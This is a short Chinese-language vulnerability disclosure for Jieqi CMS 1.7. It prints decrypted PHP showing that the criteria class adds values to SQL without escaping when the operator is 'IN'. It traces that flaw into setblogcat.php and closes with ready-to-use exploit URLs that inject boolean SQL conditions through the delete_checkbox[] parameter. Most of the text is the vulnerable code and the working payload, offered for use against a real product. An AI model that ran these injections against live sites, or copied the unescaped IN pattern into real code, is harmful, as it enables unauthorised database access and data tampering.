杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。
[php]
class criteria extends criteriaelement
{
var $column; //字段
var $operator; //分隔符
var $value; //值
function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" )
{
$this->column = $_obfuscate_eZJe9OBy;
$this->value = $_obfuscate_VgKtFeg;
$this->operator = $_obfuscate_JChWBNMCFOA;
}
function render( )
{
if ( !empty( $this->column ) )
{
$_obfuscate_yHkENun4 = $this->column." ".$this->operator;
..................................
if ( isset( $this->value ) )
..................................
//当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。
if ( strtoupper( $this->operator ) == "IN" )
{
$_obfuscate_yHkENun4 .= " ".$this->value;
return $_obfuscate_yHkENun4;
}
//引入单引号
$_obfuscate_yHkENun4 .= " '".jieqi_dbslashes( trim( $this->value ) )."'";
}
return $_obfuscate_yHkENun4;
------------------------------------------------------------------------------------------
switch ( $_REQUEST[action] )
{
case "do_edit" :
include_once( $jieqiModules['space']['path']."/class/blogcat.php" );
$blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" );
if ( $_REQUEST['delete_checkbox'] )
{
$tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")";
$criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) ); //id in ()
$criteria->add( new criteria( "`uid`", $uid ) );
$criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) );
$criteria->add( new criteria( "`default_cat`", 1, "!=" ) );
$blog_cat_handler->queryobjects( $criteria );
$v = $blog_cat_handler->getobject( );
if ( !empty( $v ) )
{
$num = $v->getvar( "num" );
$blog_cat_handler->delete( $criteria );
unset( $criteria );
}[/php]
exp:
http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23
http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23